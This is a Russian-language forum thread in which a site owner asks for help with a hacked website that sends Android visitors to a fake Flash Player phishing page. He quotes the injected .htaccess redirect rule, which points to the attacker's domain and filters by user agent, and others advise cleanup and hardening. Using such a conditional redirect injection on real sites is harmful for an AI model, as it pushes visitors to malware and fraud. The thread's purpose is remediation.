|
|
|
|
|
Помогите кто может.
Предполагаю, что сайт взломан. В частности при заходе с мобильного под ОС андроид происходит редирект на фишинговый сайт с Adobe Flash Player.
Где поискать и удалить редирект? Вот адрес сайта |
|
|
|
|
|
Если прикинуться симбой то тоже редирект...
смари .htaccess
и индекс сайта само собой...
если все чисто плагин в апачь впиздурили тебе  |
|
|
|
|
|
Спасибо, оюнаружил в htaccess такой код
RewriteRule ^(.*)$ http://wap-opera.com/in.cgi?a [L,R=302]
Убрал его теперь все нормально.
Кстати надо ли убирать строки типа RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
И что сделать чтобы такое не повторялось? |
|
|
|
|
|
Сменить все пароли, проверить комп, увели акк или самого хостера поломали (встречал такое, только с дефейсом).
Поставить более жесткие chmod'ы на htaccess и исполняемые файлы, а также папки.
Проверить файлы сайта на наличие бэкдоров и шеллов.
Поставить плагин\модуль защиты от вредоносных изменений.
Накатать абузу на сайт wap-opera.com. Если это платник партнерки - отписать им в саппорт, пусть забанят хакера, льющего с ломов, заморозив его средства. |
|
|
|
|
|
Вот что бы не повторилось эт интересный вопрос... сначала права на запись убери (444 на файл), что за движок стоит что бы понять как было сломанно, что за хост, есть ли вероятность слома твоего компа (тупо уперли фтп или шелл)
Может вообще соседа сломали если это виртуал...
Пусть супор логи посмотрим на серваке... |
|
|
|
|
|
строчки все такого плана можешь убрать в принципе (ну или закоментировать их #)
RewriteCond %{HTTP_USER_AGENT} |
|
|
|
|
|
| EdwardSn писал(а): |
И что сделать чтобы такое не повторялось?
|
я так думаю, нужно почистить комп от вирусняка(нормальным антивирем а не любимым многими авастом), сменить пароли везде... если ситуация повторится - сменить хостинг. |
|
|
|
|
|
99% что заодно валяется теперь на сайте вебшел... так что попроси к примеру меня его поискать  |
|
|
|
|
|
| Цитата: |
| 99% что заодно валяется теперь на сайте вебшел.
|
. Прошу прощения за нубовский вопрос, а что это такое?
Кстати у меня на этом же хостинге и другие сайты, там тот же редирект воткнули.
А вообще возможный заработок хакеров впечатляет, так как по этой партнгерке в случае инсталяции файла пвседо флэш плеера снимается 147 руб. единовременно + подписка 20,47 в день. При этом такой редирект не сразу обнаружишь, сам его нашел случайно, когда был в гостях у знакомого и показал ему свой сайт с его планшета. |
|
|
|
|
|
|
|
| Есть люди к которым можно обратиться проверить аккаунты? |
|
|
|
|
|
|
